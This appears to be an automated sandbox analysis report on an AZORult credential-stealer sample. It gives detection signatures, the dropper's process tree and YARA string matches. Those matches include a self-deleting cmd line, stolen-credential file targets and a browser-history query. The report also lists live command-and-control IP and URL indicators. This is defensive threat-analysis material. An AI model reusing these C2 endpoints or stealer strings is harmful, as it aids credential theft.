
Windows Analysis Report
ETVk1yP43q.exe

Overview

General Information

Sample name: ETVk1yP43q.exe (renamed because original name is a hash value)
Original sample name: 56ecf4355112dcd2f73e04d0d1784178.exe
Analysis ID: 1583137
MD5: 56ecf4355112dcd2f73e04d0d1784178
SHA1: 6ba04b9f47530333b9dda9ed424cdbf418896081
SHA256: 0b2cb44ca93dc45f099ad395ff46b2e9475e539ac8aa5a362e07f5f9f72425f6
Tags: AZORult, exe, user-abuse_ch

Detection

AZORult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected AZORult Info Stealer
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Azorult
Yara detected Azorult Info Stealer
Yara detected Generic Dropper
Binary is likely a compiled AutoIt script file
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Tries to detect virtualization through RDTSC time measurements
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ETVk1yP43q.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\ETVk1yP43q.exe" MD5: 56ECF4355112DCD2F73E04D0D1784178)
    • cexplorer.exe (PID: 6888 cmdline: "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- MD5: B2E5A8FE3CA4F0CD681B5662F972EA5F)
      • cexplorer.tmp (PID: 3320 cmdline: "C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp" /SL5="$4040E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- MD5: 729BC0108BCD7EC083DFA83D7A4577F2)
        • ChameleonExplorer.exe (PID: 3848 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister MD5: 92A3D0847FC622B31F2D0C273A676C0E)
        • ChameleonExplorer.exe (PID: 928 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer MD5: 92A3D0847FC622B31F2D0C273A676C0E)
        • ChameleonFolder.exe (PID: 5216 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
        • ChameleonExplorer.exe (PID: 1908 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update MD5: 92A3D0847FC622B31F2D0C273A676C0E)
    • update.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Roaming\update.exe" MD5: 912B031EAEE45A05000F7DE4E9B734BC)
      • update.exe (PID: 6332 cmdline: C:\Users\user\AppData\Roaming\update.exe" MD5: 912B031EAEE45A05000F7DE4E9B734BC)
  • ChameleonFolder.exe (PID: 5776 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
    • ChameleonFolder64.exe (PID: 4476 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276 MD5: 246AAA95ABDDFD76F9166A2DAA9F2D73)
  • ChameleonExplorer.exe (PID: 4364 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup MD5: 92A3D0847FC622B31F2D0C273A676C0E)
    • ChameleonFolder.exe (PID: 5024 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 6064 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 3228 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 3732 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonExplorer.exe (PID: 6284 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup MD5: 92A3D0847FC622B31F2D0C273A676C0E)
  • ChameleonFolder.exe (PID: 7012 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 7096 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • cleanup
Name: Azorult
Description: AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
Attribution: The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
No configs have been found
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
Source | Rule | Description | Author | Strings
00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Azorult_38fce9ea | unknown | unknown
  • 0x193f0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
  • 0xd564:$a2: %APPDATA%\.purple\accounts.xml
  • 0xdcac:$a3: %TEMP%\curbuf.dat
  • 0x18dd0:$a4: PasswordsList.txt
  • 0x14128:$a5: Software\Valve\Steam
00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp | Azorult_1 | Azorult Payload | kevoreilly
  • 0x17373:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
(11 further entries not shown)
Source | Rule | Description | Author | Strings
21.2.update.exe.400000.0.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
21.2.update.exe.400000.0.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
21.2.update.exe.400000.0.unpack | Windows_Trojan_Azorult_38fce9ea | unknown | unknown
  • 0x193f0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
  • 0xd564:$a2: %APPDATA%\.purple\accounts.xml
  • 0xdcac:$a3: %TEMP%\curbuf.dat
  • 0x18dd0:$a4: PasswordsList.txt
  • 0x14128:$a5: Software\Valve\Steam
21.2.update.exe.400000.0.unpack | Azorult_1 | Azorult Payload | kevoreilly
  • 0x17373:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
21.2.update.exe.29d6000.1.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
(7 further entries not shown)

                    System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe, ProcessId: 928, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chameleon Explorer
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T02:27:06.133438+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.79.229 | 443 | TCP
2025-01-02T02:28:17.624409+0100 | 2029465 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49854 | 92.63.192.63 | 80 | TCP
2025-01-02T02:28:17.624409+0100 | 2810276 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49854 | 92.63.192.63 | 80 | TCP



                    AV Detection

Source: ETVk1yP43q.exe | Avira: detected
Source: https://2no.co/1dHC37 | Avira URL Cloud: Label: malware
Source: http://92.63.192.63/index.php | Avira URL Cloud: Label: malware
Source: https://2no.co/redirect- | Avira URL Cloud: Label: malware
Source: https://2no.co/1dHC37B | Avira URL Cloud: Label: malware
Source: https://2no.co:443/1dHC37Users | Avira URL Cloud: Label: malware
Source: https://2no.co/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\update.exe | Avira: detection malicious, Label: HEUR/AGEN.1362414
Source: C:\Users\user\AppData\Roaming\update.exe | ReversingLabs: Detection: 79%
Source: ETVk1yP43q.exe | ReversingLabs: Detection: 68%
Source: ETVk1yP43q.exe | Virustotal: Detection: 59%
Source: ETVk1yP43q.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\update.exe | Code function: 21_2_0040A610 CryptUnprotectData,LocalFree,21_2_0040A610
Source: ETVk1yP43q.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.212:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: Binary string: C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb\* source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\DLL\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdbJ source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C: (x8C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb\*V@E source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\dll\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\dll\ntdll.pdbX source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb\SYSTEM32\ntdll.pdbon Explorer\symbols\dll\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\DLL\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014CA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\SYSTEM32\ntdll.pdbT source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014D7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbdb( source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbP source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \SYSTEM32\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dows\SYSTEM32\ntdll.pdbT source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdbp source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb` source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\DLL\kernel32.pdbk source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb* source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\kernel32.pdb\*Y source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\SYSTEM32\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014D7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\DLL\kernel32.pdb1 source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014CA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: leonExplorerntdll.pdb\SYSTEM32\ntdll.pdbon Explorer\symbols\dll\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
